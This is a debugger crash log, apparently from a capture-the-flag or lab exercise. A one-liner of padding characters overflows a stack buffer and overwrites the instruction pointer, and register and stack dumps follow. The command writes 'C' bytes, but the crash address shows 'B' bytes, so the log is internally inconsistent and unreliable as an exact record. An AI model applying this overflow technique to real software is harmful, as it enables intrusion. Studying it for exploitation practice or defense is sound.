python -c 'import sys;sys.stdout.write("A" * 32 + "C" *6)'

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────
 RAX  0x26
 RBX  0x0
 RCX  0x400119 (_readInput+24) ◂— add    rsp, 0x20
 RDX  0x320
 RDI  0x0
 RSI  0x7fffffffe058 ◂— 0x4141414141414141 ('AAAAAAAA')
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0x202
 R12  0x0
 R13  0x0
 R14  0x0
 R15  0x0
 RBP  0x0
 RSP  0x7fffffffe080 ◂— 0x1
 RIP  0x424242424242
──────────────────────────────────────────[ DISASM ]───────────────────────────────────────────
Invalid address 0x424242424242










───────────────────────────────────────────[ STACK ]───────────────────────────────────────────
00:0000│ rsp  0x7fffffffe080 ◂— 0x1
01:0008│      0x7fffffffe088 —▸ 0x7fffffffe3bd ◂— 0x616c2f746f6f722f ('/root/la')
02:0010│      0x7fffffffe090 ◂— 0x0
03:0018│      0x7fffffffe098 —▸ 0x7fffffffe3fd ◂— 0x622f3d4c4c454853 ('SHELL=/b')
04:0020│      0x7fffffffe0a0 —▸ 0x7fffffffe40d ◂— 0x5f4e4f4953534553 ('SESSION_')
05:0028│      0x7fffffffe0a8 —▸ 0x7fffffffe45b ◂— 0x53454343415f5451 ('QT_ACCES')
06:0030│      0x7fffffffe0b0 —▸ 0x7fffffffe46e ◂— 0x524554524f4c4f43 ('COLORTER')
07:0038│      0x7fffffffe0b8 —▸ 0x7fffffffe482 ◂— 0x554e454d5f474458 ('XDG_MENU')
─────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────
 ► f 0     424242424242
   f 1                1
   f 2     7fffffffe3bd
   f 3                0
Program received signal SIGSEGV (fault address 0x424242424242)


